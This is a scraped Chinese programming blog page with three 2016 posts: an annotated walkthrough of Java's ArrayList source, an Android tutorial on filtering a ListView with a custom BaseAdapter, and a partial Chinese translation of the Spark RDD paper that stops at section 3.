int返回值此方法是将数组中的每个元素都取出来与传入的对象进行对比，如果相等就返回对象所在下标，否则返回-1

/**
     * Returns the index of the first occurrence of the specified element
     * in this list, or -1 if this list does not contain the element.
     * More formally, returns the lowest index <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>,
     * or -1 if there is no such index.
     */
    public int indexOf(Object o) {
        if (o == null) {
            for (int i = 0; i < size; i++)
                if (elementData[i]==null)
                    return i;
        } else {
            for (int i = 0; i < size; i++)
                if (o.equals(elementData[i]))
                    return i;
        }
        return -1;
    }

lastIndexOf(Object o)方法倒序比较
int返回值实现原理跟indexOf一样，只是一个是从前到后的比较，一个是从后到前的比较

/**
     * Returns the index of the last occurrence of the specified element
     * in this list, or -1 if this list does not contain the element.
     * More formally, returns the highest index <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>,
     * or -1 if there is no such index.
     */
    public int lastIndexOf(Object o) {
        if (o == null) {
            for (int i = size-1; i >= 0; i--)
                if (elementData[i]==null)
                    return i;
        } else {
            for (int i = size-1; i >= 0; i--)
                if (o.equals(elementData[i]))
                    return i;
        }
        return -1;
    }

clone()方法
Object返回值官方解释“浅表复制”，我的理解就是创建一个List对象，但是对象内的元素内存指向没变，也就是说但修改这个集合中元素时，另一个集合中的元素也会发生变化
，也就是List集合对象，通过创建一个ArrayList 集合来接收数组

/**
     * Returns a shallow copy of this <tt>ArrayList</tt> instance.  (The
     * elements themselves are not copied.)
     *
     * @return a clone of this <tt>ArrayList</tt> instance
     */
    public Object clone() {
        try {
            @SuppressWarnings("unchecked")
                ArrayList<E> v = (ArrayList<E>) super.clone();
            v.elementData = Arrays.copyOf(elementData, size);
            v.modCount = 0;
            return v;
        } catch (CloneNotSupportedException e) {
            // this shouldn't happen, since we are Cloneable
            throw new InternalError();
        }
    }

toArray()方法
Object[] 返回值，此方法就是将底层存放的数组复制一个返回回去

/**
     * Returns an array containing all of the elements in this list
     * in proper sequence (from first to last element).
     *
     * <p>The returned array will be "safe" in that no references to it are
     * maintained by this list.  (In other words, this method must allocate
     * a new array).  The caller is thus free to modify the returned array.
     *
     * <p>This method acts as bridge between array-based and collection-based
     * APIs.
     *
     * @return an array containing all of the elements in this list in
     *         proper sequence
     */
    public Object[] toArray() {
        return Arrays.copyOf(elementData, size);
    }

toArray(T[] a)方法
Object[] 返回值，如果传入数组长度比当前集合中元素个数小，则创建一个新的数组返回，大小为集合中元素的个数，类型为传入数组的类型
传入数组长度等于集合中元素个数则将集合中的值复制进入则返回传入数组，并返回传入数组
如果长度大于元素数组个数除复制集合外还将传入数组的第size个数组置为空

/**
     * Returns an array containing all of the elements in this list in proper
     * sequence (from first to last element); the runtime type of the returned
     * array is that of the specified array.  If the list fits in the
     * specified array, it is returned therein.  Otherwise, a new array is
     * allocated with the runtime type of the specified array and the size of
     * this list.
     *
     * <p>If the list fits in the specified array with room to spare
     * (i.e., the array has more elements than the list), the element in
     * the array immediately following the end of the collection is set to
     * <tt>null</tt>.  (This is useful in determining the length of the
     * list <i>only</i> if the caller knows that the list does not contain
     * any null elements.)
     *
     * @param a the array into which the elements of the list are to
     *          be stored, if it is big enough; otherwise, a new array of the
     *          same runtime type is allocated for this purpose.
     * @return an array containing the elements of the list
     * @throws ArrayStoreException if the runtime type of the specified array
     *         is not a supertype of the runtime type of every element in
     *         this list
     * @throws NullPointerException if the specified array is null
     */
    @SuppressWarnings("unchecked")
    public <T> T[] toArray(T[] a) {
        if (a.length < size)
            // Make a new array of a's runtime type, but my contents:
            return (T[]) Arrays.copyOf(elementData, size, a.getClass());
        System.arraycopy(elementData, 0, a, 0, size);
        if (a.length > size)
            a[size] = null;
        return a;
    }

get(int index)方法
Object 返回值此方法先验证传入的下标是否在数组中，如果存在则返回对应下标的值，否则则跑出异常

/**
     * Checks if the given index is in range.  If not, throws an appropriate
     * runtime exception.  This method does *not* check if the index is
     * negative: It is always used immediately prior to an array access,
     * which throws an ArrayIndexOutOfBoundsException if index is negative.
     */
    private void rangeCheck(int index) {
        if (index >= size)
            throw new IndexOutOfBoundsException(outOfBoundsMsg(index));
    }

/**
     * Returns the element at the specified position in this list.
     *
     * @param  index index of the element to return
     * @return the element at the specified position in this list
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E get(int index) {
        rangeCheck(index);

        return elementData(index);
    }

set(int index, E element)方法
Object返回值，修改指定下标的值，并且将原来的值返回回来

/**
     * Replaces the element at the specified position in this list with
     * the specified element.
     *
     * @param index index of the element to replace
     * @param element element to be stored at the specified position
     * @return the element previously at the specified position
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E set(int index, E element) {
        rangeCheck(index);

        E oldValue = elementData(index);
        elementData[index] = element;
        return oldValue;
    }

add(E e)方法插入数组最后一位
当传入的一个参数的时候先调用ensureCapacityInternal()方法，ensureCapacityInternal是判断底层生成的那个Object数组是否越界，如果越界，则新生成一个数组，并存入值，否则则将值存入数组中
判断规则为原来值的长度的1.5倍比传入的值大则创建一个新的数组，数组长度为原来的1.5倍，如果小的话就创建一个长度为传入参数的数组，最后还有个判断是判断数组最大长度，如果新生成的那个数组长度值比系统定义的数组最大长度还大，那么将创建一个数组，此数组长度为系统默认的最大长度

/**
     * Appends the specified element to the end of this list.
     *
     * @param e element to be appended to this list
     * @return <tt>true</tt> (as specified by {@link Collection#add})
     */
    public boolean add(E e) {
        ensureCapacityInternal(size + 1);  // Increments modCount!!
        elementData[size++] = e;
        return true;
    }

/**
     * Increases the capacity to ensure that it can hold at least the
     * number of elements specified by the minimum capacity argument.
     *
     * @param minCapacity the desired minimum capacity
     */
    private void grow(int minCapacity) {
        // overflow-conscious code
        int oldCapacity = elementData.length;
        int newCapacity = oldCapacity + (oldCapacity >> 1);
        if (newCapacity - minCapacity < 0)
            newCapacity = minCapacity;
        if (newCapacity - MAX_ARRAY_SIZE > 0)
            newCapacity = hugeCapacity(minCapacity);
        // minCapacity is usually close to size, so this is a win:
        elementData = Arrays.copyOf(elementData, newCapacity);
    }

private void ensureCapacityInternal(int minCapacity) {
        modCount++;
        // overflow-conscious code
        if (minCapacity - elementData.length > 0)
            grow(minCapacity);
    }

private static int hugeCapacity(int minCapacity) {
        if (minCapacity < 0) // overflow
            throw new OutOfMemoryError();
        return (minCapacity > MAX_ARRAY_SIZE) ?
            Integer.MAX_VALUE :
            MAX_ARRAY_SIZE;
    }

ArrayList add(int index, E element) 指定插入位置
先验证要插入的位置是否在数组中，然后用跟上面原理一样的方式创建一个新数组，并且新数组，然后调用系统最底层方法System.arraycopy复制一个数组出来，将当前值存入复制出来的集合中的index位置，因为这里多了一个元素，所以要将AarrayList中的size+1

/**
     * Inserts the specified element at the specified position in this
     * list. Shifts the element currently at that position (if any) and
     * any subsequent elements to the right (adds one to their indices).
     *
     * @param index index at which the specified element is to be inserted
     * @param element element to be inserted
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public void add(int index, E element) {
        rangeCheckForAdd(index);

        ensureCapacityInternal(size + 1);  // Increments modCount!!
        System.arraycopy(elementData, index, elementData, index + 1,
                         size - index);
        elementData[index] = element;
        size++;
    }

remove(int index)方法删除指定下标的元素
Object 返回值先验证下标是否可用，然后得到当前对象，得到System.arraycopy要复制长度的值，因为下面是要从传入数组的下一个值开始复制，因此这里要减1否则取值时要越界，因为原有的值从新数组中删除，所以原有的值后面所有值都会前进一位，导致数组最后一位无值，因此需要将最后一位赋值为空

/**
     * Removes the element at the specified position in this list.
     * Shifts any subsequent elements to the left (subtracts one from their
     * indices).
     *
     * @param index the index of the element to be removed
     * @return the element that was removed from the list
     * @throws IndexOutOfBoundsException {@inheritDoc}
     */
    public E remove(int index) {
        rangeCheck(index);

        modCount++;
        E oldValue = elementData(index);

        int numMoved = size - index - 1;
        if (numMoved > 0)
            System.arraycopy(elementData, index+1, elementData, index,
                             numMoved);
        elementData[--size] = null; // Let gc do its work

        return oldValue;
    }

remove(Object o)方法根据对象删除集合中元素
boolean 返回值判断传入的对象是否在数组中，存在则执行remove(int index)的原理，并返回true,否则返回false

/**
     * Removes the first occurrence of the specified element from this list,
     * if it is present.  If the list does not contain the element, it is
     * unchanged.  More formally, removes the element with the lowest index
     * <tt>i</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;get(i)==null&nbsp;:&nbsp;o.equals(get(i)))</tt>
     * (if such an element exists).  Returns <tt>true</tt> if this list
     * contained the specified element (or equivalently, if this list
     * changed as a result of the call).
     *
     * @param o element to be removed from this list, if present
     * @return <tt>true</tt> if this list contained the specified element
     */
    public boolean remove(Object o) {
        if (o == null) {
            for (int index = 0; index < size; index++)
                if (elementData[index] == null) {
                    fastRemove(index);
                    return true;
                }
        } else {
            for (int index = 0; index < size; index++)
                if (o.equals(elementData[index])) {
                    fastRemove(index);
                    return true;
                }
        }
        return false;
    }

/*
     * Private remove method that skips bounds checking and does not
     * return the value removed.
     */
    private void fastRemove(int index) {
        modCount++;
        int numMoved = size - index - 1;
        if (numMoved > 0)
            System.arraycopy(elementData, index+1, elementData, index,
                             numMoved);
        elementData[--size] = null; // Let gc do its work
    }

clear()方法
此方法为情况当前集合，也就是清空数组，但需要注意的是，该方法不会改变数组的长度，只会将数组的值赋为空

/**
     * Removes all of the elements from this list.  The list will
     * be empty after this call returns.
     */
    public void clear() {
        modCount++;

        // Let gc do its work
        for (int i = 0; i < size; i++)
            elementData[i] = null;

        size = 0;
    }

注意事项
集合当中只能放置对象的引用，无法放置原生数据类型，我们需要使用原生数据类型的包装类才能加入到集合当中；
集合当中放置的都是Object类型，因此取出来的也是Object类型，那么我们必须要使用强制类型转换将其转换为真正的类型（放置进去的类型）；

总结
通过阅读ArrayList的源码才知道，原来ArrayList的底层是用数组实现的，并且add方法是用创建数组的方式来增长边界的。

作者：yin_Pisces 发表于2016/8/1 2:23:17 原文链接

阅读：65 评论：0 查看评论

↧

Android实现ListView过滤功能之继承BaseAdapter进阶版

August 1, 2016, 2:53 am

≫ Next: RDD：基于内存的集群计算容错抽象

≪ Previous: Java源码学习--ArrayList源码解析

Android实现ListView过滤功能之继承BaseAdapter进阶版

实现ListView过滤功能最方便的便是使用ArrayAdapter，里面自带的getFilter()方法能很方便的实现此功能

但是在实际的开发中，ArrayAdapter有的时候满足不了我们项目的各种需求，所以一般都是继承于BaseAdapter，然后继承BaseAdapter不能像ArrayAdapter那样直接通过ListView的setTextFilter()就对ListView进行简单的过滤，我们需要去手动实现一个Filterable接口，自定义过滤规则；

首先先上效果图

接下来直接上代码了
* 首先是布局文件

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
              android:layout_width="match_parent"
              android:layout_height="match_parent"
              android:background="@color/white"
              android:orientation="vertical"
    >

    <LinearLayout
        android:id="@+id/search_top_layout"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_alignParentTop="true"
        android:background="@color/blue_title_bg"
        android:gravity="center_vertical"
        android:orientation="horizontal" >


        <com.zml.collrec.view.AutoClearEditText
            android:id="@+id/search_edit"
            android:layout_width="0dp"
            android:layout_height="wrap_content"
            android:layout_margin="5dp"
            android:layout_weight="1"
            android:background="@drawable/search_box"
            android:drawableRight="@drawable/app_icon_voice"
            android:focusable="true"
            android:hint="搜索"
            android:padding="6dp"
            android:singleLine="true"
            android:textColor="@color/black"
            android:textSize="@dimen/micro_text_size" />

        <ImageButton
            android:id="@+id/search_button"
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:layout_margin="5dp"
            android:background="#035AB2"
            android:paddingLeft="10dp"
            android:paddingRight="10dp"
            android:src="@mipmap/android_search_icon" />
    </LinearLayout>

    <ListView
        android:id="@+id/search_list"
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:layout_below="@id/search_top_layout"
        android:divider="@null"
        android:dividerHeight="1dp"
        android:listSelector="@null"
        android:scrollbars="none"
         />

    </LinearLayout>

视图布局就是

* SearchFragment.java

/**
 * @author郑明亮    @email 1072307340@qq.com
 * @Time：2016/8/1 1:35
 * @version 1.0
 * TODO
 */public class SearchFragment extends Fragment implements AdapterView.OnItemClickListener, View.OnClickListener {

    // TODO: Rename parameter arguments, choose names that match
    // the fragment initialization parameters, e.g. ARG_ITEM_NUMBER
    private static final String ARG_PARAM1 = "param1";
    private static final String ARG_PARAM2 = "param2";

    List<Recomend>data = null;
    // TODO: Rename and change types of parameters
    private String mParam1;
    private String mParam2;
    RecomendAdapter adapter = null;

    private OnFragmentInteractionListener mListener;

    AutoClearEditText et_search;//我自定义的EditText
    ImageButton ib_search;
    ListView search_list;



    /**
     * Use this factory method to create a new instance of
     * this fragment using the provided parameters.
     *
     * @param param1 Parameter 1.
     * @param param2 Parameter 2.
     * @return A new instance of fragment SearchFragment.
     */
    // TODO: Rename and change types and number of parameters
    public static SearchFragment newInstance(String param1, String param2) {
        SearchFragment fragment = new SearchFragment();
        Bundle args = new Bundle();
        args.putString(ARG_PARAM1, param1);
        args.putString(ARG_PARAM2, param2);
        fragment.setArguments(args);
        return fragment;
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        if (getArguments() != null) {
            mParam1 = getArguments().getString(ARG_PARAM1);
            mParam2 = getArguments().getString(ARG_PARAM2);
        }
    }

    @Override
    public View onCreateView(LayoutInflater inflater, ViewGroup container,
                             Bundle savedInstanceState) {
        View view = inflater.inflate(R.layout.fragment_search, container, false);

        initView(view);
        //暂时模拟填充数据
        initData();
        return view;
    }

    private void initView(View view) {
        ib_search = (ImageButton) view.findViewById(R.id.search_button);
        et_search = (AutoClearEditText) view.findViewById(R.id.search_edit);
        search_list = (ListView) view.findViewById(R.id.search_list);
        search_list.setTextFilterEnabled(true); // 开启过滤功能
        ib_search.setOnClickListener(this);
        //为EditText（搜素框）设置一个TextWatcher来监视输入的动作
        et_search.addTextChangedListener(new TextWatcher() {
            @Override
            public void beforeTextChanged(CharSequence charSequence, int i, int i1, int i2) {

            }

            @Override
            public void onTextChanged(CharSequence charSequence, int start, int before, int count) {
                if (TextUtils.isEmpty(charSequence.toString().trim()))
                    search_list.clearTextFilter();//搜索文本为空时，清除ListView的过滤
                else
                search_list.setFilterText(charSequence.toString().trim());//设置过滤关键字
            }

            @Override
            public void afterTextChanged(Editable editable) {

            }
        });

    }

    private void initData(){
        data = new ArrayList<>();
        data.add(new Recomend("应用推荐","忙碌一天的你，怎么能没有一款好玩的游戏来放松一下呢"));
        data.add(new Recomend("好书推荐","读过一本好书，像交了一个益友。——臧克家"));
        data.add(new Recomend("养生推荐","三天不吃青，兩眼冒金星。寧可食無肉，不可飯無湯。吃面多喝湯，免得開藥方"));
        data.add(new Recomend("资讯推荐","风声雨声读书声，声声入耳；家事国事天下事，事事关心，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        data.add(new Recomend("更多推荐","吃喝玩乐学一应俱全，快来看看吧"));
        adapter = new RecomendAdapter(getActivity(),data);
        search_list.setAdapter(adapter);
        search_list.setOnItemClickListener(this);
    }

    @Override
    public void onAttach(Context context) {
        super.onAttach(context);
    }

    @Override
    public void onDetach() {
        super.onDetach();
    }

    @Override
    public void onItemClick(AdapterView<?> adapterView, View view, int i, long l) {
        ScreenUtils.showToast(data.get(i).getTitle());
    }

    @Override
    public void onClick(View view) {
        switch (view.getId()){
            case R.id.search_button:
                String search = et_search.getText().toString().trim();
                if (TextUtils.isEmpty(search)){
                    search_list.clearTextFilter();//搜索文本为空时，过滤设置
                }else {
//                    search_list.clearTextFilter();
                    search_list.setFilterText(search);//设置过滤关键字
                }


                break;
            default:
                break;
        }
    }

}

我在注释中已经注明了，需要注意的地方就是一定要先打开过滤功能 search_list.setTextFilterEnabled(true)
* 接下来是适配器的代码，关键代码；

/**
 * @author 郑明亮   @email 1072307340@qq.com
 * @version 1.0
 * @time 2016/7/29 18:28
 * TODO
 */
public class RecomendAdapter extends BaseAdapter implements Filterable{
    Context context;
    List<Recomend> data; //这个数据是会改变的，所以要有个变量来备份一下原始数据
    List<Recomend> backData;//用来备份原始数据
    MyFilter mFilter ;

    public RecomendAdapter(Context context, List<Recomend> data) {
        this.context = context;
        this.data = data;
        backData = data;
    }

    @Override
    public int getCount() {
        return data.size();
    }

    @Override
    public Object getItem(int i) {
        return null;
    }

    @Override
    public long getItemId(int i) {
        return 0;
    }

    @Override
    public View getView(int i, View view, ViewGroup viewGroup) {

        if (view ==null){
            view = LayoutInflater.from(context).inflate(R.layout.fragment_recomend_item,null);
       }
        TextView tv_title = ViewHolder.get(view,R.id.tv_recomend_title);
        TextView tv_desc = ViewHolder.get(view,R.id.tv_recomend_desc);
        ImageView img = ViewHolder.get(view,R.id.iv_recomend_img);
        tv_title.setText(data.get(i).getTitle());
        tv_desc.setText(data.get(i).getDesc());
        Glide.with(context).load(R.drawable.default_head_icon).asBitmap().centerCrop().placeholder(R.mipmap.ic_launcher).into(img);
        return view;
    }
    //当ListView调用setTextFilter()方法的时候，便会调用该方法
    @Override
    public Filter getFilter() {
        if (mFilter ==null){
            mFilter = new MyFilter();
        }
        return mFilter;
    }
    //我们需要定义一个过滤器的类来定义过滤规则
     class MyFilter extends Filter{
     //我们在performFiltering(CharSequence charSequence)这个方法中定义过滤规则
        @Override
        protected FilterResults performFiltering(CharSequence charSequence) {
            FilterResults result = new FilterResults();
            List<Recomend> list ;
              if (TextUtils.isEmpty(charSequence)){//当过滤的关键字为空的时候，我们则显示所有的数据
                list  = backData;
            }else {//否则把符合条件的数据对象添加到集合中
                list = new ArrayList<>();
                for (Recomend recomend:backData){
                    if (recomend.getTitle().contains(charSequence)||recomend.getDesc().contains(charSequence)){
                        LogUtil.d("performFiltering:"+recomend.toString());
                        list.add(recomend);
                    }

                }
            }
            result.values = list; //将得到的集合保存到FilterResults的value变量中
            result.count = list.size();//将集合的大小保存到FilterResults的count变量中

            return result;
        }
    //在publishResults方法中告诉适配器更新界面
        @Override
        protected void publishResults(CharSequence charSequence, FilterResults filterResults) {
            data = (List<Recomend>)filterResults.values;
            LogUtil.d("publishResults:"+filterResults.count);
            if (filterResults.count>0){
                notifyDataSetChanged();//通知数据发生了改变
                LogUtil.d("publishResults:notifyDataSetChanged");
            }else {
                notifyDataSetInvalidated();//通知数据失效
                LogUtil.d("publishResults:notifyDataSetInvalidated");
            }
        }
    }
}

本篇博文首次发布于安卓巴士
有什么疑问的地方可以留言哦~

作者：zml_2015 发表于2016/8/1 2:53:14 原文链接

阅读：63 评论：0 查看评论

↧

RDD：基于内存的集群计算容错抽象

August 1, 2016, 4:04 am

≫ Next: Web---JSTL(Java标准标签库)-Core核心标签库、I18N国际化、函数库

≪ Previous: Android实现ListView过滤功能之继承BaseAdapter进阶版

RDD：基于内存的集群计算容错抽象

该论文来自Berkeley实验室，英文标题为：ResilientDistributed Datasets: A Fault-Tolerant Abstraction for In-Memory ClusterComputing。下面的翻译，我是基于科学网翻译基础上进行优化、修改、补充，这篇译文翻译得很不错。在此基础上，我增加了来自英文原文的图和表格数据，以及译文中缺少的未翻译的部分。如果翻译措辞或逻辑有误，欢迎批评指正。

摘要

本文提出了分布式内存抽象的概念——弹性分布式数据集（RDD，ResilientDistributed Datasets），它具备像MapReduce等数据流模型的容错特性，并且允许开发人员在大型集群上执行基于内存的计算。现有的数据流系统对两种应用的处理并不高效：一是迭代式算法，这在图应用和机器学习领域很常见；二是交互式数据挖掘工具。这两种情况下，将数据保存在内存中能够极大地提高性能。为了有效地实现容错，RDD提供了一种高度受限的共享内存，即RDD是只读的，并且只能通过其他RDD上的批量操作来创建。尽管如此，RDD仍然足以表示很多类型的计算，包括MapReduce和专用的迭代编程模型（如Pregel）等。我们实现的RDD在迭代计算方面比Hadoop快20多倍，同时还可以在5-7秒内交互式地查询1TB数据集。

1.引言

无论是工业界还是学术界，都已经广泛使用高级集群编程模型来处理日益增长的数据，如MapReduce和Dryad。这些系统将分布式编程简化为自动提供位置感知性调度、容错以及负载均衡，使得大量用户能够在商用集群上分析超大数据集。

大多数现有的集群计算系统都是基于非循环的数据流模型。从稳定的物理存储（如分布式文件系统）中加载记录，记录被传入由一组确定性操作构成的DAG，然后写回稳定存储。DAG数据流图能够在运行时自动实现任务调度和故障恢复。

尽管非循环数据流是一种很强大的抽象方法，但仍然有些应用无法使用这种方式描述。我们就是针对这些不太适合非循环模型的应用，它们的特点是在多个并行操作之间重用工作数据集。这类应用包括：（1）机器学习和图应用中常用的迭代算法（每一步对数据执行相似的函数）；（2）交互式数据挖掘工具（用户反复查询一个数据子集）。基于数据流的框架并不明确支持工作集，所以需要将数据输出到磁盘，然后在每次查询时重新加载，这带来较大的开销。

我们提出了一种分布式的内存抽象，称为弹性分布式数据集（RDD，ResilientDistributed Datasets）。它支持基于工作集的应用，同时具有数据流模型的特点：自动容错、位置感知调度和可伸缩性。RDD允许用户在执行多个查询时显式地将工作集缓存在内存中，后续的查询能够重用工作集，这极大地提升了查询速度。

RDD提供了一种高度受限的共享内存模型，即RDD是只读的记录分区的集合，只能通过在其他RDD执行确定的转换操作（如map、join和groupby）而创建，然而这些限制使得实现容错的开销很低。与分布式共享内存系统需要付出高昂代价的检查点和回滚机制不同，RDD通过Lineage来重建丢失的分区：一个RDD中包含了如何从其他RDD衍生所必需的相关信息，从而不需要检查点操作就可以重构丢失的数据分区。尽管RDD不是一个通用的共享内存抽象，但却具备了良好的描述能力、可伸缩性和可靠性，但却能够广泛适用于数据并行类应用。

第一个指出非循环数据流存在不足的并非是我们，例如，Google的Pregel[21]，是一种专门用于迭代式图算法的编程模型；Twister[13]和HaLoop[8]，是两种典型的迭代式MapReduce模型。但是，对于一些特定类型的应用，这些系统提供了一个受限的通信模型。相比之下，RDD则为基于工作集的应用提供了更为通用的抽象，用户可以对中间结果进行显式的命名和物化，控制其分区，还能执行用户选择的特定操作（而不是在运行时去循环执行一系列MapReduce步骤）。RDD可以用来描述Pregel、迭代式MapReduce，以及这两种模型无法描述的其他应用，如交互式数据挖掘工具（用户将数据集装入内存，然后执行ad-hoc查询）。

Spark是我们实现的RDD系统，在我们内部能够被用于开发多种并行应用。Spark采用Scala语言[5]实现，提供类似于DryadLINQ的集成语言编程接口[34]，使用户可以非常容易地编写并行任务。此外，随着Scala新版本解释器的完善，Spark还能够用于交互式查询大数据集。我们相信Spark会是第一个能够使用有效、通用编程语言，并在集群上对大数据集进行交互式分析的系统。

我们通过微基准和用户应用程序来评估RDD。实验表明，在处理迭代式应用上Spark比Hadoop快高达20多倍，计算数据分析类报表的性能提高了40多倍，同时能够在5-7秒的延时内交互式扫描1TB数据集。此外，我们还在Spark之上实现了Pregel和HaLoop编程模型（包括其位置优化策略），以库的形式实现（分别使用了100和200行Scala代码）。最后，利用RDD内在的确定性特性，我们还创建了一种Spark调试工具rddbg，允许用户在任务期间利用Lineage重建RDD，然后像传统调试器那样重新执行任务。

本文首先在第2部分介绍了RDD的概念，然后第3部分描述SparkAPI，第4部分解释如何使用RDD表示几种并行应用（包括Pregel和HaLoop），第5部分讨论Spark中RDD的表示方法以及任务调度器，第6部分描述具体实现和rddbg，第7部分对RDD进行评估，第8部分给出了相关研究工作，最后第9部分总结。

2.弹性分布式数据集（RDD）

本部分描述RDD和编程模型。首先讨论设计目标（2.1），然后定义RDD（2.2），讨论Spark的编程模型（2.3），并给出一个示例（2.4），最后对比RDD与分布式共享内存（2.5）。

2.1 目标和概述

我们的目标是为基于工作集的应用（即多个并行操作重用中间结果的这类应用）提供抽象，同时保持MapReduce及其相关模型的优势特性：即自动容错、位置感知性调度和可伸缩性。RDD比数据流模型更易于编程，同时基于工作集的计算也具有良好的描述能力。

在这些特性中，最难实现的是容错性。一般来说，分布式数据集的容错性有两种方式：即数据检查点和记录数据的更新。我们面向的是大规模数据分析，数据检查点操作成本很高：需要通过数据中心的网络连接在机器之间复制庞大的数据集，而网络带宽往往比内存带宽低得多，同时还需要消耗更多的存储资源（在内存中复制数据可以减少需要缓存的数据量，而存储到磁盘则会拖慢应用程序）。所以，我们选择记录更新的方式。但是，如果更新太多，那么记录更新成本也不低。因此，RDD只支持粗粒度转换，即在大量记录上执行的单个操作。将创建RDD的一系列转换记录下来（即Lineage），以便恢复丢失的分区。

虽然只支持粗粒度转换限制了编程模型，但我们发现RDD仍然可以很好地适用于很多应用，特别是支持数据并行的批量分析应用，包括数据挖掘、机器学习、图算法等，因为这些程序通常都会在很多记录上执行相同的操作。RDD不太适合那些异步更新共享状态的应用，例如并行web爬行器。因此，我们的目标是为大多数分析型应用提供有效的编程模型，而其他类型的应用交给专门的系统。

2.2 RDD抽象

RDD是只读的、分区记录的集合。RDD只能基于在稳定物理存储中的数据集和其他已有的RDD上执行确定性操作来创建。这些确定性操作称之为转换，如map、filter、groupBy、join（转换不是程开发人员在RDD上执行的操作）。

RDD不需要物化。RDD含有如何从其他RDD衍生（即计算）出本RDD的相关信息（即Lineage），据此可以从物理存储的数据计算出相应的RDD分区。

2.3 编程模型

在Spark中，RDD被表示为对象，通过这些对象上的方法（或函数）调用转换。

定义RDD之后，程序员就可以在动作中使用RDD了。动作是向应用程序返回值，或向存储系统导出数据的那些操作，例如，count（返回RDD中的元素个数），collect（返回元素本身），save（将RDD输出到存储系统）。在Spark中，只有在动作第一次使用RDD时，才会计算RDD（即延迟计算）。这样在构建RDD的时候，运行时通过管道的方式传输多个转换。

程序员还可以从两个方面控制RDD，即缓存和分区。用户可以请求将RDD缓存，这样运行时将已经计算好的RDD分区存储起来，以加速后期的重用。缓存的RDD一般存储在内存中，但如果内存不够，可以写到磁盘上。

另一方面，RDD还允许用户根据关键字（key）指定分区顺序，这是一个可选的功能。目前支持哈希分区和范围分区。例如，应用程序请求将两个RDD按照同样的哈希分区方式进行分区（将同一机器上具有相同关键字的记录放在一个分区），以加速它们之间的join操作。在Pregel和HaLoop中，多次迭代之间采用一致性的分区置换策略进行优化，我们同样也允许用户指定这种优化。

2.4 示例：控制台日志挖掘

本部分我们通过一个具体示例来阐述RDD。假定有一个大型网站出错，操作员想要检查Hadoop文件系统（HDFS）中的日志文件（TB级大小）来找出原因。通过使用Spark，操作员只需将日志中的错误信息装载到一组节点的内存中，然后执行交互式查询。首先，需要在Spark解释器中输入如下Scala命令：

1	lines = spark.textFile("hdfs://...")
2	errors = lines.filter(_.startsWith("ERROR"))

3	errors.cache()

第1行从HDFS文件定义了一个RDD（即一个文本行集合），第2行获得一个过滤后的RDD，第3行请求将errors缓存起来。注意在Scala语法中filter的参数是一个闭包。

这时集群还没有开始执行任何任务。但是，用户已经可以在这个RDD上执行对应的动作，例如统计错误消息的数目：

1	errors.count()

用户还可以在RDD上执行更多的转换操作，并使用转换结果，如：

1	// Count errors mentioning MySQL:
2	errors.filter(_.contains("MySQL")).count()

3	// Return the time fields of errors mentioning
4	// HDFS as an array (assuming time is field

5	// number 3 in a tab-separated format):
6	errors.filter(_.contains("HDFS"))

7	.map(_.split('\t')(3))
8	.collect()

使用errors的第一个action运行以后，Spark会把errors的分区缓存在内存中，极大地加快了后续计算速度。注意，最初的RDDlines不会被缓存。因为错误信息可能只占原数据集的很小一部分（小到足以放入内存）。
最后，为了说明模型的容错性，图1给出了第3个查询的Lineage图。在linesRDD上执行filter操作，得到errors，然后再filter、map后得到新的RDD，在这个RDD上执行collect操作。Spark调度器以流水线的方式执行后两个转换，向拥有errors分区缓存的节点发送一组任务。此外，如果某个errors分区丢失，Spark只在相应的lines分区上执行filter操作来重建该errors分区。

图1 示例中第三个查询的Lineage图。（方框表示RDD，箭头表示转换）

2.5 RDD与分布式共享内存

为了进一步理解RDD是一种分布式的内存抽象，表1列出了RDD与分布式共享内存（DSM，DistributedShared Memory）[24]的对比。在DSM系统中，应用可以向全局地址空间的任意位置进行读写操作。（注意这里的DSM，不仅指传统的共享内存系统，还包括那些通过分布式哈希表或分布式文件系统进行数据共享的系统，比如Piccolo[28]）DSM是一种通用的抽象，但这种通用性同时也使得在商用集群上实现有效的容错性更加困难。

RDD与DSM主要区别在于，不仅可以通过批量转换创建（即“写”）RDD，还可以对任意内存位置读写。也就是说，RDD限制应用执行批量写操作，这样有利于实现有效的容错。特别地，RDD没有检查点开销，因为可以使用Lineage来恢复RDD。而且，失效时只需要重新计算丢失的那些RDD分区，可以在不同节点上并行执行，而不需要回滚整个程序。

对比项目	RDD	分布式共享内存（DSM）
读	批量或细粒度操作	细粒度操作
写	批量转换操作	细粒度操作
一致性	不重要（RDD是不可更改的）	取决于应用程序或运行时
容错性	细粒度，低开销（使用Lineage）	需要检查点操作和程序回滚
落后任务的处理	任务备份	很难处理
任务安排	基于数据存放的位置自动实现	取决于应用程序（通过运行时实现透明性）
如果内存不够	与已有的数据流系统类似	性能较差（交换？）
表1 RDD与DSM对比

注意，通过备份任务的拷贝，RDD还可以处理落后任务（即运行很慢的节点），这点与MapReduce[12]类似。而DSM则难以实现备份任务，因为任务及其副本都需要读写同一个内存位置。

与DSM相比，RDD模型有两个好处。第一，对于RDD中的批量操作，运行时将根据数据存放的位置来调度任务，从而提高性能。第二，对于基于扫描的操作，如果内存不足以缓存整个RDD，就进行部分缓存。把内存放不下的分区存储到磁盘上，此时性能与现有的数据流系统差不多。

最后看一下读操作的粒度。RDD上的很多动作（如count和collect）都是批量读操作，即扫描整个数据集，可以将任务分配到距离数据最近的节点上。同时，RDD也支持细粒度操作，即在哈希或范围分区的RDD上执行关键字查找。

3. Spark编程接口

